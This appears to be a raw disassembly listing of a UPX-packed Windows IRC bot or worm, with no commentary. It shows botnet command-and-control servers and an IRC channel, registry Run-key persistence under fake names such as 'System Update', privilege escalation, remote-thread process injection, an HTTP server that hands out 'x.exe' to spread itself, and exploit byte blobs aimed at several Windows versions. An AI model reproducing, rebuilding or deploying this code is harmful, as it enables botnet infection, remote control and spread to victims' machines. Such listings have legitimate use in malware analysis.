dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
dword_315056D4 dd 401495h, 3, 40707Ch, 1, 0 dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_31505768 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+347�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_315057D4 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+372�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_31505848 dd 0 dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 3 dup(0)
dd 586E6957h, 72502050h, 6Fh, 9 dup(0)
db 2 dup(0)
dword_31505906 dd 1004600h dw 1
dd 69570000h, 206B326Eh, 6F7250h, 0Ah dup(0)
dword_31505940 dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Ah dup(0)
; DATA XREF: sub_315011C0+41B�o
; sub_315011C0+45D�o
dd 123C0000h, 751Ch, 0Eh dup(0)
; ---------------------------------------------------------------------------
loc_315059B8: ; DATA XREF: sub_315011C0+44A�o
jmp short loc_315059C0
; ---------------------------------------------------------------------------
jmp short loc_315059C2
; ---------------------------------------------------------------------------
align 10h
loc_315059C0: ; CODE XREF: UPX0:loc_315059B8�j
; DATA XREF: sub_315011C0+5C�o
pop esp
pop esp
loc_315059C2: ; CODE XREF: UPX0:315059BA�j
and eax, 70695C73h
arpl [eax+eax], sp
; ---------------------------------------------------------------------------
dw 0
dword_315059CC dd 1CEC8166h dword_315059D0 dd 0E4FF07h aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_31501727+62�o
align 4
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_31501727+39�o
align 10h
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_31501727+2A�o
align 4
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_31501727+1B�o
align 4
aAdvapi32 db 'advapi32',0 ; DATA XREF: sub_31501727+8�o
; sub_31501D96+102�o
align 4
aUterm13_2i db 'uterm13.2i',0 ; DATA XREF: sub_315017AF:loc_31501894�o
; UPX0:31501D35�o ...
align 4
aShell_traywnd db 'Shell_TrayWnd',0 ; DATA XREF: sub_315017AF+58�o
align 4
aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: sub_315017AF:loc_315017F6�o
align 4
aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: sub_315017AF+34�o
align 4
aKernel32 db 'kernel32',0 ; DATA XREF: sub_315017AF+18�o
align 4
dword_31505A84 dd 0E9F3F5h aHttp1_1200Ok db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_31501A62+106�o
db 0Dh,0Ah
db 0Dh,0Ah,0
align 10h
aContentLengthU db 'Content-Length: %u',0Dh,0Ah ; DATA XREF: sub_31501A62+85�o
db 0Dh,0Ah,0
align 4
aHttp1_1200OkCo db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_31501A62+71�o
db 'Content-Type: application/x-exe-compressed',0Dh,0Ah,0
align 4
a_exe db '.exe',0 ; DATA XREF: sub_31501A62+55�o
; sub_315025F6+4B�o ...
align 10h
aGet db 'GET',0 ; DATA XREF: sub_31501A62+3D�o
aFtpupd_exe db 'ftpupd.exe',0 ; DATA XREF: UPX0:31501D20�o
align 10h
aUser32 db 'user32',0 ; DATA XREF: sub_31501D96+109�o
align 4
aMsvcrt db 'msvcrt',0 ; DATA XREF: sub_31501D96+FB�o
align 10h
aWininet db 'wininet',0 ; DATA XREF: sub_31501D96+F4�o
aWs2_32 db 'ws2_32',0 ; DATA XREF: sub_31501D96+E7�o
align 10h
aU14 db 'u14',0 ; DATA XREF: sub_31501D96+D5�o
aU13_2i db 'u13.2i',0 ; DATA XREF: sub_31501D96+C9�o
align 4
aU13i db 'u13i',0 ; DATA XREF: sub_31501D96+BD�o
align 4
aU13 db 'u13',0 ; DATA XREF: sub_31501D96+B1�o
aU12 db 'u12',0 ; DATA XREF: sub_31501D96+A5�o
aU11 db 'u11',0 ; DATA XREF: sub_31501D96+99�o
aU10 db 'u10',0 ; DATA XREF: sub_31501D96+8D�o
aU9 db 'u9',0 ; DATA XREF: sub_31501D96+81�o
align 4
aU8 db 'u8',0 ; DATA XREF: sub_31501D96+75�o
align 4
aU13ix db 'u13ix',0 ; DATA XREF: sub_31501D96+69�o
align 4
aU13x db 'u13x',0 ; DATA XREF: sub_31501D96+5D�o
align 4
aU12x db 'u12x',0 ; DATA XREF: sub_31501D96+51�o
align 4
aU11x db 'u11x',0 ; DATA XREF: sub_31501D96+45�o
align 4
aU10x db 'u10x',0 ; DATA XREF: sub_31501D96+3B�o
align 4
aU13_2ix db 'u13.2ix',0 ; DATA XREF: sub_31501D96+22�o
asc_31505B8C db 0Dh,0Ah,0 ; DATA XREF: sub_31501F6B+124�o
align 10h
aUseridUnix db ' : USERID : UNIX : ',0 ; DATA XREF: sub_31501F6B+104�o
aHttpSDX_exe db 'http://%s:%d/x.exe',0 ; DATA XREF: sub_31502277+2D�o
align 4
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_31501BA8+23�o
; sub_31502548+5F�o ...
align 4
aSystemUpdate db 'System Update',0 ; DATA XREF: sub_31501BA8+1C�o
; sub_315025F6+87�o ...
align 4
aZvhkaqndgcmpya db 'zvhkaqndgcmpyawrkj',0 ; DATA XREF: sub_315026C2+57�o
; sub_315026C2+8A�o
align 10h
aSoftwareMicr_0 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_315026C2+32�o
aClient db 'Client',0 ; DATA XREF: sub_315026C2+BC�o
; sub_315026C2+F8�o
align 4
aId db 'ID',0 ; DATA XREF: sub_315026C2+37�o
; sub_315026C2+75�o
align 4
aMsConfigV13 db 'MS Config v13',0 ; DATA XREF: sub_31502548+4E�o
align 4
aAvserve2_exeup db 'avserve2.exeUpdate Service',0 ; DATA XREF: sub_31502548+47�o
align 4
aAvserve_exe db 'avserve.exe',0 ; DATA XREF: sub_31502548+40�o
aWindowsUpdateS db 'Windows Update Service',0 ; DATA XREF: sub_31502548+39�o
align 4
aWinupdate db 'WinUpdate',0 ; DATA XREF: sub_31502548+32�o
align 4
aSystray db 'SysTray',0 ; DATA XREF: sub_31502548+2B�o
aBotLoader db 'Bot Loader',0 ; DATA XREF: sub_31502548+24�o
align 4
aSystemRestoreS db 'System Restore Service',0 ; DATA XREF: sub_31502548+1D�o
align 10h
aDiskDefragment db 'Disk Defragmenter',0 ; DATA XREF: sub_31502548+16�o
align 4
aWindowsSecurit db 'Windows Security Manager',0 ; DATA XREF: sub_31502548+F�o
align 10h
asc_31505CF0: ; DATA XREF: sub_315025F6+56�o
; sub_31503608+49�o
unicode 0, <\>,0
a1: ; DATA XREF: sub_315026C2+B7�o
unicode 0, <1>,0
dword_31505CF8 dd 206h, 2400h, 31415352h, 800h, 10001h, 0A495BDEFh, 0DD499F8Eh
; DATA XREF: sub_3150283F+3A�o
dd 64DB1F45h, 0DE5B5C5h, 23CBE2AAh, 63639922h, 7318481Ch
dd 749AC3F2h, 4D855620h, 0AD0FE1CCh, 691506D3h, 0A8FD8D37h
dd 700B1698h, 45504FCEh, 324A3914h, 5C10E3EFh, 0DFBDD847h
dd 371EBA84h, 8B817380h, 7D4A0DF5h, 2DFE92E0h, 0C699C9C5h
dd 9C85E020h, 6A5068BDh, 8250B629h, 7F42C334h, 1C980811h
dd 9CE7B7B2h, 3D77899Dh, 0A4D3971Ah, 0A58D5029h, 8D463A96h
dd 1612E8FCh, 44AF10EBh, 0D0F84570h, 0B178966Ah, 0EB51439Fh
dd 7086A827h, 0DE098A39h, 0C1A1C214h, 0BF167A53h, 611A85C4h
dd 9829E70Fh, 8966209Eh, 0CB1FE53h, 0ECCA9407h, 0A11E75A3h
dd 0B4E8F91Dh, 1A4ECBC5h, 69D7F0DBh, 8C1A8739h, 18C67B94h
dd 3EB38213h, 0E0424BBFh, 8400EB67h, 0AA60B737h, 22D7D8B3h
dd 7A650480h, 86FF4BA6h, 0F6458558h, 56EEF96Eh, 32002FC9h
dd 0B7A63B4Ah, 0EBD3D87Ah
aCont db 'cont',0 ; DATA XREF: sub_31502826+3�o
align 4
off_31505E14 dd offset aMoscowAdvokat_ ; DATA XREF: UPX0:315034C8�r
; UPX0:3150351A�r
; "moscow-advokat.ru"
dd offset aGraz_at_eu_und ; "graz.at.eu.undernet.org"
dd offset aFlanders_be_eu ; "flanders.be.eu.undernet.org"
dd offset aCaen_fr_eu_und ; "caen.fr.eu.undernet.org"
dd offset aBrussels_be_eu ; "brussels.be.eu.undernet.org"
dd offset aLosAngeles_ca_ ; "los-angeles.ca.us.undernet.org"
dd offset aWashington_dc_ ; "washington.dc.us.undernet.org"
dd offset aLondon_uk_eu_u ; "london.uk.eu.undernet.org"
dd offset aLia_zanet_net ; "lia.zanet.net"
dd offset aGaspode_zanet_ ; "gaspode.zanet.org.za"
dd offset aDiemen_nl_eu_u ; "diemen.nl.eu.undernet.org"
dd offset aLulea_se_eu_un ; "lulea.se.eu.undernet.org"
dd offset aCoins_dal_net ; "coins.dal.net"
dd offset aBroadway_ny_us ; "broadway.ny.us.dal.net"
dd offset aOzbytes_dal_ne ; "ozbytes.dal.net"
dd offset aVancouver_dal_ ; "vancouver.dal.net"
dd offset aViking_dal_net ; "viking.dal.net"
dd offset aCed_dal_net ; "ced.dal.net"
dd offset aQis_md_us_dal_ ; "qis.md.us.dal.net"
aQis_md_us_dal_ db 'qis.md.us.dal.net',0 ; DATA XREF: UPX0:31505E5C�o
align 4
aCed_dal_net db 'ced.dal.net',0 ; DATA XREF: UPX0:31505E58�o
aViking_dal_net db 'viking.dal.net',0 ; DATA XREF: UPX0:31505E54�o
align 10h
aVancouver_dal_ db 'vancouver.dal.net',0 ; DATA XREF: UPX0:31505E50�o
align 4
aOzbytes_dal_ne db 'ozbytes.dal.net',0 ; DATA XREF: UPX0:31505E4C�o
aBroadway_ny_us db 'broadway.ny.us.dal.net',0 ; DATA XREF: UPX0:31505E48�o
align 4
aCoins_dal_net db 'coins.dal.net',0 ; DATA XREF: UPX0:31505E44�o
align 4
aLulea_se_eu_un db 'lulea.se.eu.undernet.org',0 ; DATA XREF: UPX0:31505E40�o
align 4
aDiemen_nl_eu_u db 'diemen.nl.eu.undernet.org',0 ; DATA XREF: UPX0:31505E3C�o
align 4
aGaspode_zanet_ db 'gaspode.zanet.org.za',0 ; DATA XREF: UPX0:31505E38�o
align 4
aLia_zanet_net db 'lia.zanet.net',0 ; DATA XREF: UPX0:31505E34�o
align 4
aLondon_uk_eu_u db 'london.uk.eu.undernet.org',0 ; DATA XREF: UPX0:31505E30�o
align 4
aWashington_dc_ db 'washington.dc.us.undernet.org',0 ; DATA XREF: UPX0:31505E2C�o
align 4
aLosAngeles_ca_ db 'los-angeles.ca.us.undernet.org',0 ; DATA XREF: UPX0:31505E28�o
align 4
aBrussels_be_eu db 'brussels.be.eu.undernet.org',0 ; DATA XREF: UPX0:31505E24�o
aCaen_fr_eu_und db 'caen.fr.eu.undernet.org',0 ; DATA XREF: UPX0:31505E20�o
aFlanders_be_eu db 'flanders.be.eu.undernet.org',0 ; DATA XREF: UPX0:31505E1C�o
aGraz_at_eu_und db 'graz.at.eu.undernet.org',0 ; DATA XREF: UPX0:31505E18�o
UPX0 ends
; Section 2. (virtual address 00006000)
; Virtual size : 00003000 ( 12288.)
; Section size in file : 00003000 ( 12288.)
; Offset to raw data for section: 00006000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 31506000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
aMoscowAdvokat_ db 'moscow-advokat.ru',0 ; DATA XREF: UPX0:off_31505E14�o
; UPX1:31508401�o
align 4
aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_31502CB7+1C�o
align 10h
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_31502CB7+C�o
align 4
aUserS8S db 'USER %s 8 * :%s',0Dh,0Ah,0 ; DATA XREF: sub_31502DEC+1C4�o
align 10h
aAlready db 'already',0 ; DATA XREF: sub_31502DEC+133�o
aNickS db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_31502DEC+D9�o
; sub_31502DEC+165�o
align 4
aPassS db 'PASS %s',0Dh,0Ah,0 ; DATA XREF: sub_31502DEC+9C�o
align 10h
aPongS db 'PONG%s',0Dh,0Ah,0 ; DATA XREF: sub_3150302E+4F�o
align 4
aPing db 'PING',0 ; DATA XREF: sub_3150302E+C�o
; sub_315030B1:loc_31503153�o
align 4
a451 db '451',0 ; DATA XREF: sub_315030B1+8E�o
aJoinS db 'JOIN %s',0Dh,0Ah,0 ; DATA XREF: sub_315030B1+16�o
align 4
aQuitS db 'QUIT %s',0Dh,0Ah,0 ; DATA XREF: sub_31503183+2C�o
align 10h
aPrivmsgSS db 'PRIVMSG %s %s',0Dh,0Ah,0 ; DATA XREF: sub_315032FA+3B�o
aTaty db '#taty',0 ; DATA XREF: UPX0:3150356A�o
align 4
a13 db '13',0 ; DATA XREF: UPX0:31503460�o
align 4
a_: ; DATA XREF: UPX0:31503455�o
unicode 0, <_>,0
aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_31503608+13�o
align 4
aJoin db 'JOIN',0 ; DATA XREF: sub_31503722+2E8�o
align 4
aQ: ; DATA XREF: sub_31503722+2C3�o
unicode 0, <q>,0
aDD13SD db '%d,%d,13%s,%d',0 ; DATA XREF: sub_31503722+29D�o
align 10h
aI: ; DATA XREF: sub_31503722+253�o
unicode 0, <i>,0
asc_31506124: ; DATA XREF: sub_31503722+23A�o
unicode 0, <|>,0
aE: ; DATA XREF: sub_31503722+146�o
unicode 0, <e>,0
a1D db '-1,%d',0 ; DATA XREF: sub_31503722+78�o
align 4
dd 9 dup(0)
dword_31506158 dd 0 ; sub_31501BA8+80�w
dword_3150615C dd 0 ; sub_31501BA8+2D�w ...
dword_31506160 dd 0 ; sub_31501A62:loc_31501B10�r ...
dword_31506164 dd 68h ; UPX0:31501D40�w ...
dword_31506168 dd 0 ; sub_31501D96+33�w
dword_3150616C dd 8 dup(0) dword_3150618C dd 0 ; sub_31502277+20�r
dword_31506190 dd 31500000h ; UPX0:31501D25�w
dword_31506194 dd 0 ; sub_315021B0+53�o ...
dword_31506198 dd 0 ; UPX0:31502326�w ...
word_3150619C dw 0 ; DATA XREF: sub_315020C4+3B�r
; sub_31502128:loc_31502189�r ...
align 10h
dword_315061A0 dd 0 ; sub_315026C2+110�w ...
dword_315061A4 dd 0 ; UPX0:31503553�w ...
dword_315061A8 dd 0 ; sub_31503722+E8�r ...
dword_315061AC dd 8 dup(0) ; sub_31503722+A�o
dword_315061CC dd 38Dh dup(0) dd 0C4h, 40h, 74736C01h, 706D6372h, 47010041h, 6F4C7465h
dd 656C6163h, 6F666E49h, 53010041h, 75437465h, 6E657272h
dd 72694474h, 6F746365h, 417972h, 69725701h, 69466574h
dd 100656Ch, 53746547h, 65747379h, 6D69546Dh, 53010065h
dd 65747379h, 6D69546Dh, 466F5465h, 54656C69h, 656D69h
dd 72695601h, 6C617574h, 65657246h, 69560100h, 61757472h
dd 6C6C416Ch, 100636Fh, 4D746547h, 6C75646Fh, 6C694665h
dd 6D614E65h, 1004165h, 7274736Ch, 69706D63h, 47010041h
dd 79537465h, 6D657473h, 65726944h, 726F7463h, 1004179h
dd 7274736Ch, 41746163h, 6F430100h, 69467970h, 41656Ch
dd 6E695701h, 63657845h, 72430100h, 65746165h, 6C6F6F54h
dd 706C6568h, 6E533233h, 68737061h, 100746Fh, 636F7250h
dd 33737365h, 72694632h, 1007473h, 6D726554h, 74616E69h
dd 6F725065h, 73736563h, 72500100h, 7365636Fh, 4E323373h
dd 747865h, 74736C01h, 79706372h, 43010041h, 74616572h
dd 65764565h, 41746Eh, 69615701h, 726F4674h, 676E6953h
dd 624F656Ch, 7463656Ah, 65440100h, 6574656Ch, 656C6946h
dd 47010041h, 614C7465h, 72457473h, 726F72h, 69784501h
dd 6F725074h, 73736563h, 736C0100h, 656C7274h, 100416Eh
dd 65656C53h, 6C010070h, 63727473h, 416E7970h, 65470100h
dd 72754374h, 746E6572h, 636F7250h, 737365h, 74654701h
dd 636F7250h, 72646441h, 737365h, 616F4C01h, 62694C64h
dd 79726172h, 57010041h, 65746972h, 636F7250h, 4D737365h
dd 726F6D65h, 43010079h, 65736F6Ch, 646E6148h, 100656Ch
dd 6E65704Fh, 636F7250h, 737365h, 74654701h, 75646F4Dh
dd 6148656Ch, 656C646Eh, 47010041h, 69547465h, 6F436B63h
dd 746E75h, 65724301h, 4D657461h, 78657475h, 43010041h
dd 74616572h, 72685465h, 646165h, 65724301h, 50657461h
dd 65636F72h, 417373h, 74655301h, 6E657645h, 4F010074h
dd 456E6570h, 746E6576h, 45010041h, 54746978h, 61657268h
dd 49010064h, 7265746Eh, 6B636F6Ch, 6E496465h, 6D657263h
dd 746E65h, 61655201h, 6C694664h, 47010065h, 69467465h
dd 6953656Ch, 100657Ah, 61657243h, 69466574h, 41656Ch
dd 0D100h, 0
dd 72430100h, 43747079h, 74616572h, 73614865h, 43010068h
dd 74707972h, 68736148h, 61746144h, 72430100h, 56747079h
dd 66697265h, 67695379h, 7574616Eh, 416572h, 79724301h
dd 65447470h, 6F727473h, 73614879h, 43010068h, 74707972h
dd 74736544h, 4B796F72h, 1007965h, 70797243h, 6C655274h
dd 65736165h, 746E6F43h, 747865h, 79724301h, 63417470h
dd 72697571h, 6E6F4365h, 74786574h, 43010041h, 74707972h
dd 6F706D49h, 654B7472h, 52010079h, 72436765h, 65746165h
dd 4579654Bh, 1004178h, 53676552h, 61567465h, 4565756Ch
dd 1004178h, 51676552h, 79726575h, 756C6156h, 41784565h
dd 65520100h, 65704F67h, 79654B6Eh, 417845h, 67655201h
dd 656C6544h, 61566574h, 4165756Ch, 65520100h, 6F6C4367h
dd 654B6573h, 41010079h, 74726F62h, 74737953h, 68536D65h
dd 6F647475h, 416E77h, 0DE00h, 0F800h, 74610100h, 100696Fh
dd 6E617461h, 69730100h, 6301006Eh, 100736Fh, 5F48455Fh
dd 6C6F7270h, 100676Fh, 78435F5Fh, 61724678h, 6148656Dh
dd 656C646Eh, 73010072h, 68637274h, 73010072h, 70637274h
dd 73010079h, 61637274h, 5F010074h, 65637865h, 685F7470h
dd 6C646E61h, 337265h, 72747301h, 727473h, 6E617201h, 73010064h
dd 646E6172h, 656D0100h, 7970636Dh, 74730100h, 6E656C72h
dd 656D0100h, 7465736Dh, 0E90000h, 13C0000h, 77010000h
dd 69727073h, 4166746Eh, 65470100h, 726F4674h, 6F726765h
dd 57646E75h, 6F646E69h, 46010077h, 57646E69h, 6F646E69h
dd 1004177h, 57746547h, 6F646E69h, 72685477h, 50646165h
dd 65636F72h, 64497373h, 0F40000h, 1500000h, 49010000h
dd 7265746Eh, 4F74656Eh, 556E6570h, 416C72h, 746E4901h
dd 656E7265h, 65704F74h, 100416Eh, 65746E49h, 74656E72h
dd 64616552h, 656C6946h, 6E490100h, 6E726574h, 65477465h
dd 6E6F4374h, 7463656Eh, 74536465h, 657461h, 10000h, 16400h
dd 12FF00h, 0FF0008FFh, 2FF0073h, 0DFF00h, 0FF0001FFh
dd 6FFF0039h, 0BFF00h, 0FF0034FFh, 0CFF0017h, 9FF00h, 0FF0004FFh
dd 10FF0013h, 16FF00h, 3FFh, 0
dd 4550h, 2014Ch, 40D3275Dh, 2 dup(0)
dd 10F00E0h, 6010Bh, 3400h, 1200h, 0
dd 1D18h, 1000h, 5000h, 31500000h, 1000h, 200h, 4, 0
dd 4, 0
dd 7000h, 400h, 0
dd 2, 100000h, 1000h, 100000h, 1000h, 0
dd 10h, 2 dup(0)
dd 3B68h, 8Ch, 14h dup(0)
dd 1000h, 1B0h, 6 dup(0)
dd 7865742Eh, 74h, 3330h, 1000h, 3400h, 400h, 3 dup(0)
dd 0E0040020h, 7461642Eh, 61h, 11CDh, 5000h, 1200h, 3800h
dd 3 dup(0)
dd 0C0000040h, 6000h, 3DA4h, 652Ch, 0C48BC800h, 0BC4B56DDh
dd 8BE18B0Ch, 0C371406Ah, 23231C47h, 5182363h, 9F080C14h
dd 4232323h, 8410FC00h, 7CF83A10h, 107C777Eh, 0E8B81078h
dd 6EFBE9BBh, 0B8E6B56h, 0D01D0CECh, 163B40B8h, 27EFBAE9h
dd 930520CCh, 1308E719h, 0CD180701h, 57850802h, 0F7C90B07h
dd 2F2B0096h, 0BE4A0030h, 4EE0E2E7h, 41601F57h, 57D93758h
dd 9ED0h, 443FFFBh, 746858EBh, 2F3A7074h, 3732312Fh, 0FF01302Eh
dd 31BFFD91h, 3030383Ah, 652E652Fh, 0DF6578h, 697A6F4Dh
dd 6D616C6Ch, 2FDBFFFFh, 5DDF2734h, 0B966C933h, 758D01F1h
dd 8AFE8B05h, 7993C06h, 0FF8ADF46h, 302C06BFh, 88993446h
dd 0EDE24707h, 0DAE80AEBh, 65622EFAh, 0FF6FFF67h, 93712EFBh
dd 1201C999h, 0FD91BDFDh, 72C10716h, 0FD42AA68h, 10FDAA66h
dd 0FBADD8BAh, 0A91C14F7h, 0F3C91A98h, 8608F198h, 10C57102h
dd 0FFD9FD87h, 37CB5F90h, 1C965992h, 0E4143A78h, 0A7D7157h
dd 0F6DF7D3Ah, 0F34571C9h, 8904F19Dh, 9C04F109h, 0CE91FEC7h
dd 67B44011h, 10F0E3F3h, 0B20BD11Ch, 0F7FB1B59h, 0C99B6076h
dd 14D90125h, 0CA17A204h, 0F9647F99h, 688D2B58h, 1AAE9161h
dd 1D966661h, 0DADEDB11h, 50B22867h, 149900C8h, 265557DCh
dd 0DBBDBF12h, 0C0A44E3Fh, 99491291h, 54F7EDh, 0CA3AC414h
dd 0FBBB0FCBh, 1C3C71D9h, 21E424FFh, 0CDCDCF1Ah, 0F72C668Fh
dd 8166D93Fh, 0B0FB133Fh, 0CDC383B8h, 64A85D12h, 0C96CDF3Bh
dd 0AE251DCBh, 93FD0C24h, 485AFEC9h, 14C096A6h, 0A7294C1Ch
dd 609CF3EBh, 0BA9767EFh, 0F43416EAh, 0DBF57126h, 0FFF77ECDh
dd 0EF133BF9h, 376B4629h, 4766DE5Fh, 0B7AAA8ECh, 8519F0ABh
dd 1FFFF90h, 0EDFFC5B7h, 0FDE9ECE9h, 0FCE1FCB7h, 0F6FFC999h
dd 0F55BBE5Fh, 0F2E9FCFCh, 0FCF7EBFCh, 0D9ABAAF5h, 0AAF934C7h
dd 9F25B459h, 2AFF97FDh, 0ACC9662Ah, 0B7819093h, 83639D90h
dd 9271CDC9h, 3519BF30h, 0C2FBB083h, 95DC1451h, 2A91720Ah
dd 0D2EEC871h, 0FFFFEDFFh, 80D512A5h, 0AA529AE1h, 2A8D146Fh
dd 12B9C89Ah, 474A9A8Bh, 0AB9E5958h, 0A319DB9Bh, 6FFFFEDFh
dd 0A26CEC20h, 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h, 1FBDC812h
dd 0EB8D2E96h, 0FFE68584h, 9A85D812h, 99D125Ah, 0F8105A9Ah
dd 0B725D599h, 49FFDDB7h, 0FEFD7F66h, 5AA98712h, 850295C2h
dd 91048212h, 0A89BF35Ah, 0CFF7CB6Dh, 53FF855Dh, 8F72424Dh
dd 1874485Dh, 0FE85C853h, 2006206h, 0FFFFF1ADh, 4E204350h
dd 4F575445h, 50204B52h, 52474F52h, 31204D41h, 0FFFB17CDh
dd 414CF6B1h, 0A024D4Eh, 646E6957h, 2073776Fh, 20726F66h
dd 2DD60357h, 676B7F6Dh, 70756F72h, 611A330Eh, 5E234D27h
dd 32E96C3Eh, 32322158h, 4E312E32h, 6F92054h, 2018DA6Bh
dd 0A470323Ch, 50BB738Bh, 0A07192Bh, 5123FF0Ch, 7D8363h
dd 140A1104h, 0BBD40520h, 0CABB5BE8h, 4B4C0069h, 505353h
dd 0FB829756h, 8C91EDFh, 240057E0h, 64006Eh, 77006Fh, 0F6F63A73h
dd 30749B62h, 398C0901h, 3233500h, 1D44B6E6h, 0DA00072Eh
dd 644E7901h, 0DA2008ABh, 92649A87h, 26039F57h, 6D8360C8h
dd 47234601h, 73FF4007h, 60F23h, 1F011006h, 0E0888A15h
dd 0FF600048h, 4FE5FFh, 6A198144h, 49E4F27Ah, 30AF281Ch
dd 67107425h, 214FE153h, 0DF5C44DFh, 4003075h, 2DAE6BAFh
dd 5ABD075Ch, 8D615C08h, 4D75DC8Dh, 36072Eh, 30772E38h
dd 0DB7BAF61h, 0EC00491Bh, 3B240043h, 2D63003Fh, 64CF201Fh
dd 4DC08A2h, 0E41EC240h, 0FF16BFh, 0E00DEDEh, 19F1600h
dd 37EF2602h, 28404261h, 8B110319h, 0B868DECBh, 0D374D96Ch
dd 2A630070h, 0BE4296DBh, 9F256B9Ch, 75480E10h, 43D81DDh
dd 5413541Bh, 0FB9F265Ah, 5963D6DCh, 0CBC75C22h, 5876545h
dd 0F3483B55h, 10030B00h, 110B848h, 349FFFFBh, 286A0105h
dd 0B10C3919h, 0A89B11D0h, 0D94FC000h, 655FF52Eh, 5D1FF85Fh
dd 1CEB8A88h, 0E89F11C9h, 48102B3Ch, 9F25D160h, 0F40CEC8Bh
dd 0CA060A3h, 790F200Ch, 0CB10CA0h, 4EFFBE00h, 880CA08Eh
dd 90040h, 703ECh, 49E11EC1h, 4F401495h, 0BF40707Ch, 0B2297B22h
dd 13430700h, 3FF09E79h, 138578h, 0E9A65BABh, 2FF81013h
dd 273C635h, 230EFEFFh, 30C1D240h, 84083658h, 0E4F24388h
dd 10B97DD3h, 0B801FFEEh, 0F2200C10h, 0AD793661h, 0F7F070Dh
dd 0E59F25D8h, 70011815h, 90060F84h, 0F84790Fh, 2000F95h
dd 0FC9E4D87h, 6C0F847Fh, 0C89A000Fh, 0A884AADEh, 0CA13436Fh
dd 1F8C093Fh, 50586E69h, 3C725020h, 0C0A6DBh, 39014446h
dd 0C93C6B32h, 123C844Fh, 41027515h, 7B220053h, 941C840Dh
dd 0AFFF9B01h, 0C606EB1Ch, 73255C5Ch, 6370695Ch, 9F816624h
dd 0ECFFF97Fh, 0E4FF071Ch, 44655300h, 67756265h, 6C697669h
dd 41656765h, 0B266DB64h, 73756AFFh, 6B6F5474h, 73176E65h
dd 75126F4Ch, 927F76FDh, 6C615670h, 17416575h, 6F28704Fh
dd 2FFE0C63h, 347324B6h, 76646143h, 33697061h, 12E2AEE3h
dd 6574757Fh, 13316D72h, 0BB036932h, 65A37F12h, 72545F15h
dd 39577961h, 0EF72431Bh, 65DBEDDCh, 65521E61h, 54056F6Dh
dd 56140C68h, 6E747269h, 75B6D6EDh, 5328415Ch, 520F7845h
dd 5F466E72h, 4B35D67Ah, 4822F3F5h, 83505454h, 89712FDEh
dd 5B322040h, 0D4B4F20h, 0DBFD010Ah, 6F4BFDADh, 2D02446Eh
dd 7467044Ch, 25203A68h, 2961ED75h, 282F189Bh, 0F4B97954h
dd 266B7DB6h, 696C70A7h, 15698563h, 0A32D782Fh, 0CB77EED8h
dd 6D6F632Dh, 65CD7270h, 5BDF5764h, 0D4FF28h, 544547h
dd 11640266h, 0DD2BFDA1h, 6D9573D7h, 0B1637673h, 6DA2DDD7h
dd 65017765h, 5F320F08h, 0FDCCDCE6h, 34317517h, 507F703h
dd 9A696E07h, 3132032Eh, 0D8133930h, 38B3937Bh, 2306781Fh
dd 0C9BDC07h, 4F303132h, 7F7F7529h, 0BB2098FBh, 52455355h
dd 4E084449h, 65849h, 48217B59h, 253AE8A1h, 0C5A7CD64h
dd 53FFF2F6h, 5754464Fh, 5C455241h, 736F694Dh, 0DD5CC36Fh
dd 0B783F0D6h, 7275435Ch, 0C8560972h, 0B55CFE73h, 52C3E142h
dd 7953BC75h, 0F25290FDh, 0E7A1877Fh, 6664579Ah, 6E687361h
dd 6473647Ah, 76D6126Ch, 77495313h, 5C573F61h, 0ED860A1h
dd 528B396Ch, 0B44B0D57h, 39C23D6h, 667120F5h, 0F70E86EFh
dd 76206769h, 38761BFDh, 9D326576h, 67B9B64Bh, 10532064h
dd 0B81B6544h, 1421B237h, 1B17235Ch, 9B325C3Fh, 42004CABh
dd 0AC91203Fh, 3D9F1A35h, 0B01EBF23h, 654AD42h, 69443792h
